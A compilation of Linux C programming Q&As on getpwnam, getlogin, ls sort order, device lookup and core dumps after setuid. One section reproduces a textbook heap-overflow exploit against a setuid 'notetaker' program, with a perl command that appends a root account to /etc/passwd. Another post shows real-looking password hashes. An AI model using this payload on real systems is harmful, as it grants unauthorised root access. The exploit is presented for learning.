I'm trying to make a web logging and I use getpwnam() function to check username existing. But for valid username getpwnam returns error: No such file or directory. So I tried getpwnam_r(), but it also failed with the same error. I'm running on embedded arm linux and I use /etc/passwd for password storing (I don't have /etc/shadow). My test program is:
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
int
main(int argc, char *argv[])
{
struct passwd pwd;
struct passwd *result;
char *buf;
size_t bufsize;
int s;
if (argc != 2) {
fprintf(stderr, "Usage: %s username\n", argv[0]);
exit(EXIT_FAILURE);
}
bufsize = sysconf(_SC_GETPW_R_SIZE_MAX);
if (bufsize == -1) /* Value was indeterminate */
bufsize = 16384; /* Should be more than enough */
buf = malloc(bufsize);
if (buf == NULL) {
perror("malloc");
exit(EXIT_FAILURE);
}
s = getpwnam_r(argv[1], &pwd, buf, bufsize, &result);
if (result == NULL) {
if (s == 0)
printf("Not found\n");
else {
errno = s;
perror("getpwnam_r");
}
exit(EXIT_FAILURE);
}
printf("Name: %s; UID: %ld\n", pwd.pw_gecos, (long) pwd.pw_uid);
exit(EXIT_SUCCESS);
}
Password file can be written only by root:
/ # ls -l /etc/passwd
-rw-r--r-- 1 root root 207 Jan 1 00:29 /etc/passwd
/ #
I also tried to run my program (test) with root rights, but it also failed when I gave it an existing username.
/ # /tmp/test admin
getpwnam_r: No such file or directory
/ #
1) So, what I forgot about, or what should do additionally?
2) Do I need to use /etc/shadow file for storing passwords for system users?
Update:
My passwd file is:
~ # cat /etc/passwd
root:b6MVch7fPLasN:0:0:root:/home/root:/bin/ash
admin:8Mt/Jtxcyg8AY:1000:1000:admin:/tmp:/tmp/cli
user:5v4HoPrA9NtUo:1001:1000:user:/tmp:/tmp/cli
~ #
Thanks in advance! Bakir
1) The search service or method used in the password database (/etc/passwd) is defined in /etc/nsswitch.conf. To use this service getpwnam function calls shared library in the lib directory: /lib/libnss_SERVICE.so.x, where SERVICE is the search method. In my case compat is default method because of absent of /etc/nsswitch.conf. So, I was need to add libnss_compat.so.2 to /lib.
strace is useful thing!
Many thanks to osqx and alk!
Related
I'm working on a C application in which I need the name of the currently logged in user. I have tried using getlogin() and getlogin_r() with no success (tested on multiple systems with Ubuntu 16.04 LTS). The application will run as root so I cannot use the environment variables.
Both getlogin() and getlogin_r() work just fine on other Ubuntu 17.04/17.10/18.04(beta) so I don't understand why it doesn't work in 16.04.
Here is a code snippet that I used to test:
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>
int main(int argc, char *argv[])
{
char user[512] = {0};
int ret = getlogin_r(user, 512);
if ( ret != 0){
fprintf(stderr, "Unable to get User name. Return: %d\n", ret);
}
else{
fprintf(stdout, "Username: %s\n", user);
}
char *lgn;
struct passwd *pw;
if ((lgn = getlogin()) == NULL || (pw = getpwnam(lgn)) == NULL)
{
fprintf(stderr, "Get of user information failed.\n");
}
struct passwd *pwd = getpwuid(getuid());
if (pwd){
fprintf(stdout, "Success! Username: %s\n", pwd->pw_name);
}else
fprintf(stderr, "Failed");
return 0;
}
This is the output generated when I execute the code as root:
Unable to get User name. Return : 2
Get of user information failed.
Success! Username: root
getpwuid returns the details of the user running the process so it is not helpful.
I'm kind of stuck now and any help is highly appreciated.
Output using strerror()
getlogin_r() : No such process
getlogin() : No such file or directory
Success! Username: root
I'm trying to write a function that mimics the output of the ls command in Unix. I was originally trying to perform this using scandir and alphasort, and this did indeed print the files in the directory, and it did sort them, but for some reason, this sorted list does not seem to match the same "sorted list" of filenames that ls gives.
For example, if I have a directory that contains file.c, FILE.c, and ls.c.
ls displays them in the order: file.c FILE.c ls.c
But when I sort it using alphasort/scandir, it sorts them as: FILE.c file.c ls.c
How does ls sort the files in the directory such that it gives such a differently ordered result?
To emulate default ls -1 behaviour, make your program locale-aware by calling
setlocale(LC_ALL, "");
near the beginning of your main(), and use
count = scandir(dir, &array, my_filter, alphasort);
where my_filter() is a function that returns 0 for names that begin with a dot ., and 1 for all others. alphasort() is a POSIX function that uses the locale collation order, same order as strcoll().
The basic implementation is something along the lines of
#define _POSIX_C_SOURCE 200809L
#define _ATFILE_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <locale.h>
#include <string.h>
#include <dirent.h>
#include <stdio.h>
#include <errno.h>
static void my_print(const char *name, const struct stat *info)
{
/* TODO: Better output; use info too, for 'ls -l' -style output? */
printf("%s\n", name);
}
static int my_filter(const struct dirent *ent)
{
/* Skip entries that begin with '.' */
if (ent->d_name[0] == '.')
return 0;
/* Include all others */
return 1;
}
static int my_ls(const char *dir)
{
struct dirent **list = NULL;
struct stat info;
DIR *dirhandle;
int size, i, fd;
size = scandir(dir, &list, my_filter, alphasort);
if (size == -1) {
const int cause = errno;
/* Is dir not a directory, but a single entry perhaps? */
if (cause == ENOTDIR && lstat(dir, &info) == 0) {
my_print(dir, &info);
return 0;
}
/* Print out the original error and fail. */
fprintf(stderr, "%s: %s.\n", dir, strerror(cause));
return -1;
}
/* We need the directory handle for fstatat(). */
dirhandle = opendir(dir);
if (!dirhandle) {
/* Print a warning, but continue. */
fprintf(stderr, "%s: %s\n", dir, strerror(errno));
fd = AT_FDCWD;
} else {
fd = dirfd(dirhandle);
}
for (i = 0; i < size; i++) {
struct dirent *ent = list[i];
/* Try to get information on ent. If fails, clear the structure. */
if (fstatat(fd, ent->d_name, &info, AT_SYMLINK_NOFOLLOW) == -1) {
/* Print a warning about it. */
fprintf(stderr, "%s: %s.\n", ent->d_name, strerror(errno));
memset(&info, 0, sizeof info);
}
/* Describe 'ent'. */
my_print(ent->d_name, &info);
}
/* Release the directory handle. */
if (dirhandle)
closedir(dirhandle);
/* Discard list. */
for (i = 0; i < size; i++)
free(list[i]);
free(list);
return 0;
}
int main(int argc, char *argv[])
{
int arg;
setlocale(LC_ALL, "");
if (argc > 1) {
for (arg = 1; arg < argc; arg++) {
if (my_ls(argv[arg])) {
return EXIT_FAILURE;
}
}
} else {
if (my_ls(".")) {
return EXIT_FAILURE;
}
}
return EXIT_SUCCESS;
}
Note that I deliberately made this more complex than strictly needed for your purposes, because I did not want you to just copy and paste the code. It will be easier for you to compile, run, and investigate this program, then port the needed changes -- possibly just the one setlocale("", LC_ALL); line! -- to your own program, than try and explain to your teacher/lecturer/TA why the code looks like it was copied verbatim from somewhere else.
The above code works even for files specified on the command line (the cause == ENOTDIR part). It also uses a single function, my_print(const char *name, const struct stat *info) to print each directory entry; and to do that, it does call stat for each entry.
Instead of constructing a path to the directory entry and calling lstat(), my_ls() opens a directory handle, and uses fstatat(descriptor, name, struct stat *, AT_SYMLINK_NOFOLLOW) to gather the information in basically the same manner as lstat() would, but name being a relative path starting at the directory specified by descriptor (dirfd(handle), if handle is an open DIR *).
It is true that calling one of the stat functions for each directory entry is "slow" (especially if you do /bin/ls -1 style output). However, the output of ls is intended for human consumption; and very often piped through more or less to let the human view it at leisure. This is why I would personally do not think the "extra" stat() call (even when not really needed) is a problem here. Most human users I know of tend to use ls -l or (my favourite) ls -laF --color=auto anyway. (auto meaning ANSI colors are used only if standard output is a terminal; i.e. when isatty(fileno(stdout)) == 1.)
In other words, now that you have the ls -1 order, I would suggest you modify the output to be similar to ls -l (dash ell, not dash one). You only need to modify my_print() for that.
In alphanumeric (dictionary) order.
That changes with language, of course. Try:
$ LANG=C ls -1
FILE.c
file.c
ls.c
And:
$ LANG=en_US.utf8 ls -1
file.c
FILE.c
ls.c
That is related to the "collating order". Not a simple issue by any measure.
Let's say I have a file in Linux with this path:
/path/to/file/test.mp3
I want to know the path to its device. For example I want to get something like:
/dev/sdb1
How do I do this with the C programming language?
I know the terminal command to do it, but I need C functions that will do the job.
EDIT:
I have read this question before asking mine. It doesn't concretly mention code in C, it's more related to bash than to the C language.
Thanks.
You need to use stat on the file path, and get the device ID st_dev and match that to a device in /proc/partitions
Read this for how to interpret st_dev: https://web.archive.org/web/20171013194110/http://www.makelinux.net:80/ldd3/chp-3-sect-2
I just needed that inside a program I am writing...
So instead of running "df" and parsing the output, I wrote it from scratch.
Feel free to contribute!
To answer the question:
You first find the device inode using stat() then iterate and parse /proc/self/mountinfo to find the inode and get the device name.
/*
Get physical device from file or directory name.
By Zibri <zibri AT zibri DOT org>
https://github.com/Zibri/get_device
*/
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <libgen.h>
int get_device(char *name)
{
struct stat fs;
if (stat(name, &fs) < 0) {
fprintf(stderr, "%s: No such file or directory\n", name);
return -1;
}
FILE *f;
char sline[256];
char minmaj[128];
sprintf(minmaj, "%d:%d ", (int) fs.st_dev >> 8, (int) fs.st_dev & 0xff);
f = fopen("/proc/self/mountinfo", "r");
if (f == NULL) {
fprintf(stderr, "Failed to open /proc/self/mountinfo\n");
exit(-1);
}
while (fgets(sline, 256, f)) {
char *token;
char *where;
token = strtok(sline, "-");
where = strstr(token, minmaj);
if (where) {
token = strtok(NULL, " -:");
token = strtok(NULL, " -:");
printf("%s\n", token);
break;
}
}
fclose(f);
return -1;
}
int main(int argc, char **argv)
{
if (argc != 2) {
fprintf(stderr, "Usage:\n%s FILE OR DIRECTORY...\n", basename(argv[0]));
return -1;
}
get_device(argv[1]);
return 0;
}
output is just the device name.
Example:
$ gcc -O3 getdevice.c -o gd -Wall
$ ./gd .
/dev/sda4
$ ./gd /mnt/C
/dev/sda3
$ ./gd /mnt/D
/dev/sdb1
$
Use this command to print the partition path:
df -P <pathname> | awk 'END{print $1}'
This problem deals with an exploit on page 155 of the book Hacking: The art of exploitation. Here, the Notetaker program is used to append an entry with root privileges onto the /etc/passwd file.
The code for Notetaker.c goes like this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"
void usage(char *prog_name, char *filename) {
printf("Usage: %s <data to add to %s>\n", prog_name, filename);
exit(0);
}
void fatal(char *); // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper
int main(int argc, char *argv[]) {
int userid, fd; // file descriptor
char *buffer, *datafile;
buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/var/notes");
if(argc < 2) // If there aren't commandline arguments
usage(argv[0], datafile); // display usage message and exit
strcpy(buffer, argv[1]); // copy into buffer
printf("[DEBUG] buffer # %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] datafile # %p: \'%s\'\n", datafile, datafile);
// Opening the file
fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(fd == -1)
fatal("in main() while opening file");
printf("[DEBUG] file descriptor is %d\n", fd);
userid = getuid(); // get the real user ID
// Writing data
if(write(fd, &userid, 4) == -1) // write user ID before note data
fatal("in main() while writing userid to file");
write(fd, "\n", 1); // terminate line
if(write(fd, buffer, strlen(buffer)) == -1) // write note
fatal("in main() while writing buffer to file");
write(fd, "\n", 1); // terminate line
// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved.\n");
free(buffer);
free(datafile);
}
A soft link is created to /bin/bash thru /tmp/etc/passwd
"password" is given as a default password with salt XX--XXq2wKiyI43A2
And User ID is given as 0- to get root privileges.
The exploit goes as below:
$ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 .
":/root:/tmp/etc/passwd"')
When I try this, all I get is a fatal error while opening the file saying permission is denied.
It seems to work just fine in the book since $tail /etc/passwd shows the new entry thru this exploit which gives a root access.
Pls help.
You need to read chapter two. It shows you changing the owner to root via chown and chmod u+s. page 93.
after change user from root to nobody in c language, and I am sure the program core dump, but always can't generate core file.
I'm sure nobody have the right to generate file in current dir. and ulimit -c is unlimited, and I use :
system("echo 'tesstestestestestetestestet!!!!!!' > hahahahhaahahah");
after change user from root to nobody, the file hahahahhaahahah was created!
so, I'm very confuse!
here is my c file:
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
int main()
{
#if 1
struct passwd *pw;
//char *username = "root";
char *username = "nobody";
if (getuid() == 0 || geteuid() == 0)
{
if (username == 0 || *username == '\0')
{
fprintf(stderr, "can't run as root without the -u switch\n");
exit(-1);
}
if ((pw = getpwnam(username)) == NULL)
{
fprintf(stderr, "can't find the user %s to switch to\n", username);
exit(-1);
}
if (setgid(pw->pw_gid) < 0 || setuid(pw->pw_uid) < 0)
{
fprintf(stderr, "failed to assume identity of user %s\n", username);
exit(-1);
}
}
#endif
printf("now user change to group id %d, user id %d\n", getgid(), getuid());
system("echo 'tesstestestestestetestestet!!!!!!' > hahahahhaahahah");
char *test_a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
char *test_b;
strcpy(test_b, test_a);
*(char *)1=1;
printf("test_b:%s\n", test_b);
}
Read carefully core(5) man page:
There are various circumstances in which a core dump file is not produced:
.... skipping some text from the man page ....
The process is executing a set-user-ID (set-group-ID) program that is owned by a user (group) other than the real user (group) ID of the process.
So basically, after a successful setuid(2) syscall, core is not dumped.(for security reasons)
See also the Linux specific prctl(2) syscall, with PR_SET_DUMPABLE.
Read also http://advancedlinuxprogramming.com/
NB. Have a nobody writable directory is probably a bad idea. The nobody user should usually not own any file or directory!